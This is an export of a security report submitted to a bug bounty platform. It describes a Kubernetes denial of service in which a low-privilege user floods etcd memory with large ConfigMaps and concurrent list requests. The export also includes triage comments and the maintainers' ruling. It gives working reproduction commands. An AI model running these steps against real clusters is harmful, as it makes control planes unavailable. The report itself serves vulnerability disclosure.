dlipovetsky/dos-report-not-accepted.md

## dos-report-not-accepted.md

      
Notes:

The report was not accepted. I intend to file a public issue, but haven't yet.
Kubernetes asks for reports to be submitted through https://hackerone.com, which is where I submitted this one. This is an export of that report.

Title:         Concurrent list requests of many, large Kubernetes resources cause etcd members to exhaust almost all available memory
Scope:         https://github.com/kubernetes/kubernetes
Weakness:      Denial of Service
Severity:      Medium (6.5)
Link:          /reports/1058775
Date:          2020-12-14 21:20:50 +0000
By:            @dlipovetsky
CVE IDs:
Details:
Summary:

In a Kubernetes cluster deployed with the default configuration, a user who can create and list large (e.g. 1MB) resources (e.g. ConfigMaps) can cause one or more etcd members to exhaust almost all available memory of the host, causing one or more control plane replicas to become unavailable. In my experiments, the kernel OOM-killed multiple processes, including etcd, but affected control plane replicas still needed to be restarted to become available again.
Moreover, any client (e.g. a controller) that watches said resources may exhaust its available (e.g. restricted by a quota) memory when synchronizing its cache.
As the available memory of each control plane replica increases, so do the number of resources that must be created and the number of concurrent list requests required to reproduce this vulnerability. For 3 control plane replicas, each with 16GB system memory, 200 1MB ConfigMaps and 100 concurrent list requests should be sufficient. I have not yet looked for an upper bound of either the number of resources or concurrent list requests.
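As a rough back-of-the-envelope check of those numbers, the sketch below multiplies them out. It assumes (this was not measured) that every in-flight list request holds a full copy of all payloads in memory, and it ignores encoding and protocol overhead, so it is only an order-of-magnitude estimate.

```shell
# Assumption: each concurrent list request holds one full copy of every
# ConfigMap payload; serialization overhead is ignored.
configmaps=200
payload_bytes=1024768        # payload size used in the reproduction steps
concurrent_lists=100

per_list_bytes=$((configmaps * payload_bytes))
total_bytes=$((per_list_bytes * concurrent_lists))

echo "per list:  $((per_list_bytes / 1024 / 1024)) MiB"
echo "all lists: $((total_bytes / 1024 / 1024 / 1024)) GiB"
```

Under that assumption, the aggregate comes to roughly 19 GiB, which is more than the 16GB of system memory on each replica.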
In v1.20, API Priority and Fairness is enabled by default. It has had no effect on my experiments; although some of the concurrent list requests are throttled, etcd still exhausts available memory. To be fair, I have not changed the default configuration.
I have also replicated these experiments with Secrets (which, unlike ConfigMaps, can be larger than 1MB). Other resources may also work.
Kubernetes Version:

v1.20.0
v1.19.x
v1.18.x
Component Version:

etcd v3.4.13
etcd v3.4.3
Steps To Reproduce:


Deploy a Kubernetes cluster with the default configuration. I used kubeadm on an Ubuntu 20.04 VM.


Create role and rolebinding for system:serviceaccount:default:default


USER="system:serviceaccount:default:default"
kubectl create role configmap-readwriter --verb=create,list --resource=configmap
kubectl create rolebinding default-configmap-readwriter --user "$USER" --role configmap-readwriter

Create kubeconfig context for "system:serviceaccount:default:default" and cluster "kubernetes"
Note: You may need to change the CLUSTERNAME value.

CLUSTERNAME=kubernetes
TOKENNAME="$(kubectl get serviceaccount/default -o jsonpath='{.secrets[0].name}')"
TOKEN="$(kubectl get secret $TOKENNAME -o=jsonpath='{.data.token}' | base64 --decode)"
kubectl config set-credentials default-sa --token="$TOKEN"
kubectl config set-context default-sa --user=default-sa --cluster="$CLUSTERNAME"

(Optional) Verify the limited privileges

kubectl config use-context default-sa
kubectl auth can-i --list


(Optional) Observe the available memory on one or more control plane replicas
For example, use watch "free -h".
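If a timestamped log is more useful than an interactive view, something like the following sketch could be run on a control plane replica instead. The helper name mem_available_mib is hypothetical; it reads the MemAvailable field from /proc/meminfo (Linux only), or from any file in the same format.

```shell
# Print MemAvailable in MiB, read from a meminfo-formatted file.
# Defaults to /proc/meminfo when no file is given.
mem_available_mib() {
  awk '/^MemAvailable:/ { printf "%d\n", $2 / 1024 }' "${1:-/proc/meminfo}"
}

# Log one timestamped sample every 2 seconds until interrupted:
# while sleep 2; do echo "$(date +%T) $(mem_available_mib) MiB available"; done
```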


Using the default-sa context created above, create 200 ConfigMaps, 1MB each, in the default namespace
kubectl config use-context default-sa
cat > cm.yaml<<EOF
apiVersion: v1
kind: ConfigMap
metadata:
  generateName: payload-
data:
  payload: $(base64 --wrap=0 /dev/urandom | head -c 1024768)
EOF
for i in {1..200}; do kubectl create -f cm.yaml; done


Using the default-sa context created above, list all ConfigMaps in the default namespace, 100 times, concurrently


kubectl config use-context default-sa
for i in {1..100}; do kubectl get configmaps & done
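
The loop above backgrounds the requests and returns immediately. To see how many of them failed (for example, because they were throttled or the API server became unavailable), a small wrapper along these lines could be used. The function name run_concurrent is hypothetical and not part of the original report.

```shell
# Run a command N times concurrently, wait for all invocations to finish,
# and print how many of them exited with a non-zero status.
run_concurrent() {
  n="$1"; shift
  pids=""
  i=0
  while [ "$i" -lt "$n" ]; do
    "$@" > /dev/null 2>&1 &
    pids="$pids $!"
    i=$((i + 1))
  done
  failed=0
  for pid in $pids; do
    wait "$pid" || failed=$((failed + 1))
  done
  echo "$failed"
}

# Usage against the cluster from the steps above:
# run_concurrent 100 kubectl get configmaps
```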
Supporting Material/References:

Exhausting available memory while responding to list queries seems to be a known issue for etcd: etcd-io/etcd#12457 (comment). There is a proposal to add a QoS mechanism to protect etcd from its clients.
Impact

An attack could make the cluster control plane unavailable. It could also cause other API clients (e.g. controllers) to exhaust their available memory.
Timeline:
2020-12-14 21:23:37 +0000: @dlipovetsky (comment)
This is my first time estimating CVE severity. My coworkers reviewed my report, and had no objections, but I take responsibility, and apologize, if the severity is incorrect.

2020-12-15 11:35:06 +0000: @turtle_shell (bug triaged)
Hello @dlipovetsky,
Thank you for your submission! We were able to validate your report, and have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and when/if a fix will be implemented. Please note that the status and severity are subject to change.
Regards,
@turtle_shell

2020-12-15 11:41:34 +0000: @turtle_shell (report severity updated)

2020-12-15 16:58:24 +0000: @dlipovetsky (comment)
Thanks for triaging this, and the update, @turtle_shell.
I realize that this issue might be seen as a failure of "tuning the control plane for the appropriate scale," but I suspect that the attack works at any scale, though I admit I have not tested this exhaustively.

2020-12-16 17:30:31 +0000: @dlipovetsky (comment)

> There is a proposal to add a QoS mechanism to protect etcd from its clients.

I misunderstood this proposal. It's more about fairness, and I don't think it will address the issue I'm reporting.


2020-12-18 22:40:25 +0000: @tallclair (bug informative)
I've reviewed this issue with several of the kubernetes API machinery leads, and we've concluded that this is largely working as intended. Existing mitigations include:


- we don't allow anonymous users to do this
- resourcequota can be used to limit how many configmaps can exist in a namespace
- the audit logs let you find which user is abusing you
- naughty, non-anonymous users can be handled out of band
- naughty, non-anonymous users that aren't constrained by quota can do all sorts of bad things to your cluster


Furthermore, there are known scalability issues with list requests, but those are being handled as scalability and performance bugs, not as security issues.
If you are not satisfied with these mitigations, I encourage you to file a public issue or raise the concerns with SIG API Machinery.

2020-12-18 22:40:51 +0000: @tallclair (agreed on going public)

2020-12-19 00:08:46 +0000: @dlipovetsky (comment)
Thanks for reviewing, and the feedback, @tallclair.
I'll take some time to see whether I can reproduce this taking namespace resource quotas into account.
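
For reference, an object-count quota of the kind suggested in the review could be sketched as follows. The quota name and the limit of 10 are hypothetical values chosen only for illustration, and whether such a quota prevents the memory exhaustion has not been tested here; note that it limits the number of ConfigMaps, not their size.

```shell
# Write a ResourceQuota manifest that caps the number of ConfigMaps in the
# default namespace. The name "configmap-count" and the limit "10" are
# illustrative assumptions, not values from the report.
cat > quota.yaml <<EOF
apiVersion: v1
kind: ResourceQuota
metadata:
  name: configmap-count
  namespace: default
spec:
  hard:
    configmaps: "10"
EOF

# Apply as a cluster administrator (not with the restricted default-sa context):
# kubectl apply -f quota.yaml
```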